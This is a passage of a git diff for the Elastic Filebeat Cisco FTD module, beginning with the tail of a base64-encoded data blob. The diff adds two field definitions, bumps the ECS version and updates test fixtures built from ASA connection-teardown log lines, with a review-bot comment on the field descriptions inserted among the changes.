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" } diff --git a/x-pack/filebeat/module/cisco/ftd/_meta/fields.yml b/x-pack/filebeat/module/cisco/ftd/_meta/fields.yml index 7c31ecd11ff..88f1d922df1 100644 --- a/x-pack/filebeat/module/cisco/ftd/_meta/fields.yml +++ b/x-pack/filebeat/module/cisco/ftd/_meta/fields.yml @@ -114,3 +114,15 @@ default_field: false description: > The assigned DAP records + + - name: termination_user + type: keyword + default_field: false + description: > + AAA name of user requesting termination + + - name: webvpn.group_name + type: keyword + default_field: false + description: > + The WebVPN group name the user belongs to diff --git a/x-pack/filebeat/module/cisco/ftd/config/input.yml b/x-pack/filebeat/module/cisco/ftd/config/input.yml index ebf27d1b115..6635c2800b8 100644 --- a/x-pack/filebeat/module/cisco/ftd/config/input.yml +++ b/x-pack/filebeat/module/cisco/ftd/config/input.yml @@ -22,7 +22,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 {{ if .external_zones }} - add_fields: diff --git a/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json index cbb36cb6185..ca827be6c56 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json 
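Review bot: The `termination_user` description added in the `cisco/ftd/_meta/fields.yml` hunk does not say which events populate the field, or that the value is taken as-is from the device's log line, and anyone writing a detection or audit query on it needs both. I would extend it to something like `AAA name of the user that requested the connection teardown, as reported by the device in the teardown message`. The fixture change in `asa-fix.log-expected.json` appears to show it set on a 302016 event next to `cisco.ftd.source_username`. Whether the pipeline also appends the name to `related.user` is not visible in this part of the diff; if it does not, identity pivots across events will miss these records. `webvpn.group_name` introduces a nested `webvpn` object where the neighbouring fields visible here are flat (`source_username`, `source_interface`), so a one-line comment on why it is grouped would help the next maintainer.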
@@ -6,6 +6,7 @@ "cisco.ftd.message_id": "302016", "cisco.ftd.source_interface": "Outside", "cisco.ftd.source_username": "(LOCAL\\Elastic)", + "cisco.ftd.termination_user": "zzzzzz", "destination.address": "10.233.123.123", "destination.ip": "10.233.123.123", "destination.port": 53, diff --git a/x-pack/filebeat/module/cisco/ftd/test/asa.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/asa.log-expected.json index 70e87e332d9..475389976c6 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/asa.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/asa.log-expected.json @@ -131,6 +131,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -190,6 +191,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -249,6 +251,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", 
@@ -308,6 +311,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -367,6 +371,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:48.000Z", "event.timezone": "-02:00", @@ -426,6 +431,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:48.000Z", "event.timezone": "-02:00", @@ -485,6 +491,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:48.000Z", "event.timezone": "-02:00", @@ -544,6 +551,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", 
@@ -603,6 +611,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -662,6 +671,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -721,6 +731,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -780,6 +791,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -839,6 +851,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:46.000Z", "event.timezone": "-02:00", 
@@ -898,6 +911,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -957,6 +971,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:46.000Z", "event.timezone": "-02:00", @@ -1016,6 +1031,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:45.000Z", "event.timezone": "-02:00", @@ -1075,6 +1091,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", + "event.reason": "SYN Timeout", "event.severity": 6, "event.start": "2018-10-10T14:34:26.000Z", "event.timezone": "-02:00", @@ -2744,6 +2761,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-10-10T14:34:56.000Z", "event.timezone": "-02:00", 
